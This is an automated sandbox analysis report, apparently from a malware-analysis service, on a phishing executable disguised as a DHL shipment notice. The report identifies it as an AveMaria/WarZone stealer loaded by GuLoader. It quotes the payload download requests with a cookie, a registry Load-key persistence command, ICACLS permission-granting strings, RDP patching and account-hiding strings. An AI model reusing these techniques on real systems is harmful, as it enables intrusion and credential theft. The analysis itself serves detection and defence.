Source: global traffic	HTTP traffic detected: GET /docs/securesc/sk5nfb6a71bsi4kb0hoi93t8ubc457n9/ga5uidumionb8nmhr97qp7gio0ican94/1638383175000/11612195336931281153/13277406679786744507Z/1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0c-74-docs.googleusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /nonceSigner?nonce=g9j0jkqh8v4q0&continue=https://doc-0c-74-docs.googleusercontent.com/docs/securesc/sk5nfb6a71bsi4kb0hoi93t8ubc457n9/ga5uidumionb8nmhr97qp7gio0ican94/1638383175000/11612195336931281153/13277406679786744507Z/1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g?e%3Ddownload&hash=e91gtvc094ihcc9ia8q0ll4kbtb8mnkn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheConnection: Keep-AliveHost: docs.google.comCookie: NID=511=PCUCReJmoWpqNNqKO4_UkEHyi29_BVE3-UTrB3VIWMDCK28Vi4C51ApTQuDt5eJCkdd7valarSBw5jjh5O2AbOqMKaOCQXxYdvMjXDuxh9JnqNzMHtnTZsorv6Dq7QaujUxZ97nfTtPnW-orDUqsKBpi9peJYQtWVvXHi4Ubp9Y
Source: global traffic	HTTP traffic detected: GET /docs/securesc/sk5nfb6a71bsi4kb0hoi93t8ubc457n9/ga5uidumionb8nmhr97qp7gio0ican94/1638383175000/11612195336931281153/13277406679786744507Z/1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g?e=download&nonce=g9j0jkqh8v4q0&user=13277406679786744507Z&hash=rku0rgkmu2p00qlf7mek88sknpvsopf2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheConnection: Keep-AliveHost: doc-0c-74-docs.googleusercontent.comCookie: AUTH_1nlrmlvj42thkf2l2rvk4km6kc4dhvlu_nonce=g9j0jkqh8v4q0

Uses secure TLS version for HTTPS connections

Source: unknown	HTTPS traffic detected: 142.250.185.206:443 -> 192.168.11.20:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.212.161:443 -> 192.168.11.20:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.206:443 -> 192.168.11.20:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.78:443 -> 192.168.11.20:49766 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook

Source: C:\ProgramData\images.exe

Windows user hook set: 0 keyboard low level C:\ProgramData\images.exe

Jump to behavior

Installs a raw input device (often for capturing keystrokes)

Source: DHL Express shipment notification.exe, 0000000E.00000003.907384773.0000000001A02000.00000004.00000001.sdmp

Binary or memory string: GetRawInputData

E-Banking Fraud:

Yara detected AveMaria stealer

Source: Yara match	File source: 29.3.images.exe.18d2b78.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.DHL Express shipment notification.exe.1a02148.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.DHL Express shipment notification.exe.1a02148.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.DHL Express shipment notification.exe.1a02148.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000003.907384773.0000000001A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.907015214.00000000019AE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1348162067.00000000018CB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1348433470.00000000018D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1347991515.00000000018AC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.907561845.0000000001A08000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Potential malicious icon found

Source: initial sample

Icon embedded in PE file: bad icon match: 20047c7c70f0e004

Malicious sample detected (through community Yara rule)

Source: 29.3.images.exe.18d2b78.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 29.3.images.exe.18d2b78.4.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 14.3.DHL Express shipment notification.exe.1a02148.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.3.DHL Express shipment notification.exe.1a02148.0.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 14.3.DHL Express shipment notification.exe.1a02148.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.3.DHL Express shipment notification.exe.1a02148.4.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 14.3.DHL Express shipment notification.exe.1a02148.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.3.DHL Express shipment notification.exe.1a02148.4.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown

Uses 32bit PE files

Source: DHL Express shipment notification.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Yara signature match

Source: 29.3.images.exe.18d2b78.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 29.3.images.exe.18d2b78.4.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.3.DHL Express shipment notification.exe.1a02148.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.3.DHL Express shipment notification.exe.1a02148.0.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.3.DHL Express shipment notification.exe.1a02148.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.3.DHL Express shipment notification.exe.1a02148.4.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.3.DHL Express shipment notification.exe.1a02148.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.3.DHL Express shipment notification.exe.1a02148.4.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda

Detected potential crypto function

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_0228AA34		5_2_0228AA34
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_02296860		5_2_02296860
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_0228D8CF		5_2_0228D8CF
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_0228DFFD		5_2_0228DFFD
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_022939E4		5_2_022939E4
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_022949D1		5_2_022949D1
Source: C:\ProgramData\images.exe	Code function: 21_2_0228AA34		21_2_0228AA34
Source: C:\ProgramData\images.exe	Code function: 21_2_02296860		21_2_02296860
Source: C:\ProgramData\images.exe	Code function: 21_2_0228D8CF		21_2_0228D8CF
Source: C:\ProgramData\images.exe	Code function: 21_2_0228DFFD		21_2_0228DFFD
Source: C:\ProgramData\images.exe	Code function: 21_2_022939E4		21_2_022939E4
Source: C:\ProgramData\images.exe	Code function: 21_2_022949D1		21_2_022949D1

Contains functionality to call native functions

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_0228AA34 NtWriteVirtualMemory,		5_2_0228AA34
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_022960AF LoadLibraryA,NtProtectVirtualMemory,		5_2_022960AF
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_0228D8CF NtAllocateVirtualMemory,		5_2_0228D8CF
Source: C:\ProgramData\images.exe	Code function: 21_2_0228AA34 NtWriteVirtualMemory,		21_2_0228AA34
Source: C:\ProgramData\images.exe	Code function: 21_2_022960AF LoadLibraryA,NtProtectVirtualMemory,		21_2_022960AF
Source: C:\ProgramData\images.exe	Code function: 21_2_0228D8CF NtAllocateVirtualMemory,		21_2_0228D8CF

Sample file is different than original file name gathered from version info

Source: DHL Express shipment notification.exe, 00000005.00000002.740264413.0000000002330000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSlesk8.exeFE2XJ vs DHL Express shipment notification.exe
Source: DHL Express shipment notification.exe, 00000005.00000000.594334059.0000000000424000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameSlesk8.exe vs DHL Express shipment notification.exe
Source: DHL Express shipment notification.exe, 0000000E.00000000.735045174.0000000000424000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameSlesk8.exe vs DHL Express shipment notification.exe
Source: DHL Express shipment notification.exe, 0000000E.00000002.1030995382.000000001F243000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSlesk8.exe vs DHL Express shipment notification.exe
Source: DHL Express shipment notification.exe, 0000000E.00000003.908372108.0000000001A08000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSlesk8.exe vs DHL Express shipment notification.exe
Source: DHL Express shipment notification.exe	Binary or memory string: OriginalFilenameSlesk8.exe vs DHL Express shipment notification.exe

PE file contains strange resources

Source: DHL Express shipment notification.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: images.exe.14.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Tries to load missing DLLs

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Section loaded: edgegdi.dll			Jump to behavior
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Section loaded: edgegdi.dll			Jump to behavior
Source: C:\ProgramData\images.exe	Section loaded: edgegdi.dll			Jump to behavior
Source: C:\ProgramData\images.exe	Section loaded: edgegdi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: edgegdi.dll			Jump to behavior

Uses reg.exe to modify the Windows registry

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"

PE / OLE file has an invalid certificate

Source: DHL Express shipment notification.exe

Static PE information: invalid certificate

Sample is known by Antivirus

Source: DHL Express shipment notification.exe	Virustotal: Detection: 25%
Source: DHL Express shipment notification.exe	ReversingLabs: Detection: 11%

Sample reads its own file content

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

File read: C:\Users\user\Desktop\DHL Express shipment notification.exe

Jump to behavior

PE file has an executable .text section and no other executable section

Source: DHL Express shipment notification.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Reads software policies

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Parts of this applications are using VB runtime library 6.0 (Probably coded in Visual Basic)

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll			Jump to behavior
Source: C:\ProgramData\images.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll			Jump to behavior

Spawns processes

Source: unknown	Process created: C:\Users\user\Desktop\DHL Express shipment notification.exe "C:\Users\user\Desktop\DHL Express shipment notification.exe"
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Process created: C:\Users\user\Desktop\DHL Express shipment notification.exe "C:\Users\user\Desktop\DHL Express shipment notification.exe"
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Process created: C:\ProgramData\images.exe C:\ProgramData\images.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
Source: C:\ProgramData\images.exe	Process created: C:\ProgramData\images.exe C:\ProgramData\images.exe
Source: C:\ProgramData\images.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Process created: C:\Users\user\Desktop\DHL Express shipment notification.exe "C:\Users\user\Desktop\DHL Express shipment notification.exe"			Jump to behavior
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"			Jump to behavior
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Process created: C:\ProgramData\images.exe C:\ProgramData\images.exe			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"			Jump to behavior
Source: C:\ProgramData\images.exe	Process created: C:\ProgramData\images.exe C:\ProgramData\images.exe			Jump to behavior
Source: C:\ProgramData\images.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe			Jump to behavior

Uses an in-process (OLE) Automation server

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32

Jump to behavior

Creates files inside the user directory

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

File created: C:\Users\user\AppData\Roaming\XvFu5flZcgudIlwvVLtjOx372

Jump to behavior

Classification label

Source: classification engine

Classification label: mal100.rans.phis.troj.spyw.evad.winEXE@15/2@6/6

Creates mutexes

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3240:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3240:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6244:304:WilStaging_02

Creates files inside the program directory

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

File created: C:\Program Files\Microsoft DN1

Jump to behavior

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Creates a directory in C:\Program Files

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

Directory created: C:\Program Files\Microsoft DN1

Jump to behavior

Binary contains paths to debug symbols

Source:	Binary string: C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: DHL Express shipment notification.exe, 0000000E.00000003.906801058.0000000001A0D000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.1001852923.00000000134B0000.00000040.00000001.sdmp, images.exe, 0000001D.00000003.1347841343.00000000018DE000.00000004.00000001.sdmp
Source:	Binary string: >+D C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: DHL Express shipment notification.exe, 0000000E.00000003.906801058.0000000001A0D000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.1001852923.00000000134B0000.00000040.00000001.sdmp, images.exe, 0000001D.00000003.1347841343.00000000018DE000.00000004.00000001.sdmp

Data Obfuscation:

Yara detected GuLoader

Source: Yara match	File source: 0000001D.00000000.1167143937.0000000001660000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.740062045.0000000002280000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.738081811.0000000001660000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.1170292211.0000000002280000.00000040.00000001.sdmp, type: MEMORY

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_00406464 push edx; iretd		5_2_0040647C
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_0040A07F push ds; iretd		5_2_0040A095
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_004070A2 push 3E0AA415h; retf		5_2_004070B7
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_00403976 pushfd ; ret		5_2_0040398B
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_022826FB push eax; iretd		5_2_022826FC
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_02284C6D push eax; iretd		5_2_02284C6F
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_022810E0 push es; retf 55A4h		5_2_0228F640
Source: C:\ProgramData\images.exe	Code function: 21_2_00406464 push edx; iretd		21_2_0040647C
Source: C:\ProgramData\images.exe	Code function: 21_2_0040A07F push ds; iretd		21_2_0040A095
Source: C:\ProgramData\images.exe	Code function: 21_2_004070A2 push 3E0AA415h; retf		21_2_004070B7
Source: C:\ProgramData\images.exe	Code function: 21_2_00403976 pushfd ; ret		21_2_0040398B
Source: C:\ProgramData\images.exe	Code function: 21_2_022826FB push eax; iretd		21_2_022826FC
Source: C:\ProgramData\images.exe	Code function: 21_2_02284C6D push eax; iretd		21_2_02284C6F
Source: C:\ProgramData\images.exe	Code function: 21_2_022810E0 push es; retf 55A4h		21_2_0228F640

Persistence and Installation Behavior:

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

File created: C:\ProgramData\images.exe

Jump to dropped file

Drops PE files

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

File created: C:\ProgramData\images.exe

Jump to dropped file

Boot Survival:

Creates an undocumented autostart registry key

Source: C:\Windows\SysWOW64\reg.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Load

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Contains functionality to hide user accounts

Source: DHL Express shipment notification.exe, 0000000E.00000003.907384773.0000000001A02000.00000004.00000001.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: DHL Express shipment notification.exe, 0000000E.00000003.907384773.0000000001A02000.00000004.00000001.sdmp	String found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
Source: DHL Express shipment notification.exe, 0000000E.00000003.907015214.00000000019AE000.00000004.00000001.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: DHL Express shipment notification.exe, 0000000E.00000003.907015214.00000000019AE000.00000004.00000001.sdmp	String found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
Source: DHL Express shipment notification.exe, 0000000E.00000003.907561845.0000000001A08000.00000004.00000001.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: DHL Express shipment notification.exe, 0000000E.00000003.907561845.0000000001A08000.00000004.00000001.sdmp	String found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
Source: images.exe, 0000001D.00000003.1348162067.00000000018CB000.00000004.00000001.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: images.exe, 0000001D.00000003.1348162067.00000000018CB000.00000004.00000001.sdmp	String found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
Source: images.exe, 0000001D.00000003.1348433470.00000000018D9000.00000004.00000001.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
